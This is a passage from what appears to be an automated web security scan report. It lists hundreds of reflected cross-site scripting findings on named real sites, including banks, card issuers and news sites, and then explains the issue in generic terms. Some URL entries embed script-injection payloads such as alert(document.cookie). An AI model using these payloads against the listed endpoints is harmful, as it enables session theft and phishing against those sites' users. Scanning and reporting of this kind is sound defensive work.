1.361. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [REST URL parameter 5]

1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]

1.363. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [REST URL parameter 5]

1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]

1.365. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [REST URL parameter 5]

1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]

1.367. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [REST URL parameter 5]

1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]

1.369. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [REST URL parameter 5]

1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]

1.371. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [REST URL parameter 5]

1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]

1.373. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [REST URL parameter 5]

1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]

1.375. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 1]

1.376. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 2]

1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]

1.378. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [REST URL parameter 5]

1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]

1.380. http://mortgage.ocregister.com/44146092a8373b49c062f68d9825aa14.css [REST URL parameter 1]

1.381. http://mortgage.ocregister.com/css/print.css [REST URL parameter 1]

1.382. http://mortgage.ocregister.com/css/print.css [REST URL parameter 2]

1.383. http://mortgage.ocregister.com/feed/ [REST URL parameter 1]

1.384. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]

1.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

1.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

1.392. http://mortgage.ocregister.com/files [REST URL parameter 1]

1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

1.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

1.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

1.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

1.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

1.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

1.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

1.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

1.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

1.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

1.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

1.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

1.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

1.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

1.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

1.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

1.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

1.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

1.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

1.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]

1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]

1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]

1.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]

1.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.419. http://onlinecheckingsbanking.com/ [adid parameter]

1.420. http://onlinecheckingsbanking.com/ [keyword parameter]

1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]

1.422. http://peoplesbank.com/search.php [term parameter]

1.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]

1.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]

1.426. http://pluckit.demandmedia.com/requests [apiKey parameter]

1.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]

1.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]

1.429. http://r.turn.com/server/pixel.htm [fpid parameter]

1.430. http://r.turn.com/server/pixel.htm [sp parameter]

1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

1.432. http://smm.sitescout.com/tag.jsp [h parameter]

1.433. http://smm.sitescout.com/tag.jsp [pid parameter]

1.434. http://smm.sitescout.com/tag.jsp [w parameter]

1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

1.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]

1.437. http://weather.weatherbug.com/ [zcode parameter]

1.438. http://weather.weatherbug.com/ [zcode parameter]

1.439. http://weather.weatherbug.com/ [zcode parameter]

1.440. http://weather.weatherbug.com/ [zcode parameter]

1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]

1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]

1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]

1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]

1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]

1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]

1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]

1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]

1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]

1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]

1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]

1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]

1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]

1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]

1.455. http://www.local.com/dart/ [cat parameter]

1.456. http://www.local.com/dart/ [cat parameter]

1.457. http://www.local.com/dart/ [css parameter]

1.458. http://www.local.com/dart/ [l parameter]

1.459. http://www.local.com/dart/ [l parameter]

1.460. http://www.local.com/dart/ [ord parameter]

1.461. http://www.local.com/dart/ [ord parameter]

1.462. http://www.local.com/dart/ [p parameter]

1.463. http://www.local.com/dart/ [p parameter]

1.464. http://www.local.com/dart/ [pos parameter]

1.465. http://www.local.com/dart/ [pos parameter]

1.466. http://www.local.com/dart/ [sz parameter]

1.467. http://www.local.com/dart/ [sz parameter]

1.468. http://www.local.com/dart/ [t parameter]

1.469. http://www.local.com/dart/ [t parameter]

1.470. http://www.local.com/dart/ [zone parameter]

1.471. http://www.local.com/dart/ [zone parameter]

1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.475. http://www.local.com/results.aspx [cid parameter]

1.476. http://www.local.com/results.aspx [cid parameter]

1.477. http://www.local.com/results.aspx [client parameter]

1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

1.479. http://www.local.com/topics/ [keyword parameter]

1.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]

1.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]

1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]

1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]

1.484. http://www.myfinances.com/blog.html [page parameter]

1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]

1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]

1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]

1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]

1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]

1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]

1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]

1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]

1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]

1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]

1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]

1.496. http://www.myfinances.com/budget.php [query parameter]

1.497. http://www.myfinances.com/budget.php [query parameter]

1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]

1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.500. https://www.openforum.com/ [cid parameter]

1.501. https://www.openforum.com/ [inav parameter]

1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.503. http://www.supermedia.com/business-listings [campaignId parameter]

1.504. http://www.supermedia.com/business-listings [tsrc parameter]

1.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

1.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

1.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

1.508. http://www.supermedia.com/online-advertising [campaignId parameter]

1.509. http://www.supermedia.com/online-advertising [tsrc parameter]

1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]

1.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]

1.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

1.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

1.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

1.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

1.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

1.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

1.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

1.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

1.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

1.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

1.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

1.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

1.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

1.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

1.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

1.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

1.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

1.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

1.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

1.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

1.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

1.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

1.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

1.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

1.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

1.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

1.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

1.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

1.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

1.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

1.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

1.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

1.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

1.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

1.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

1.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

1.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

1.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

1.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

1.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

1.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

1.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

1.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

1.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

1.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

1.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

1.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

1.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

1.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

1.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

1.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

1.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

1.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

1.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

1.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

1.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

1.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

1.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

1.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

1.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

1.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

1.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

1.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

1.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

1.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

1.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

1.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

1.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

1.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

1.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

1.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

1.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

1.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

1.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

1.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

1.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

1.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

1.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

1.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

1.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

1.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

1.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

1.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

1.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

1.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

1.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

1.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

1.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

1.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

1.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

1.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

1.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

1.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

1.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

1.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

1.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

1.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

1.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

1.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

1.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

1.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

1.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

1.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

1.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

1.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

1.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

1.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

1.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

1.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

1.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

1.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

1.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

1.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

1.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

1.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

1.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

1.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

1.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

1.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

1.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

1.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

1.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

1.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

1.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

1.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

1.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

1.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

1.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

1.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

1.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

1.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

1.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

1.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

1.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

1.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

1.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

1.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

1.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

1.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

1.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

1.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

1.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

1.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

1.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

1.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

1.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

1.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

1.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

1.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

1.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

1.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

1.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

1.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

1.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

1.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

1.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

1.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

1.688. http://www.experts123.com/questions/ask [Referer HTTP header]

1.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

1.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

1.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

1.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

1.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

1.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

1.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

1.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

1.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

1.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

1.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

1.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

1.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

1.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

1.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

1.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]



1. Cross-site scripting (reflected)
There are 707 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

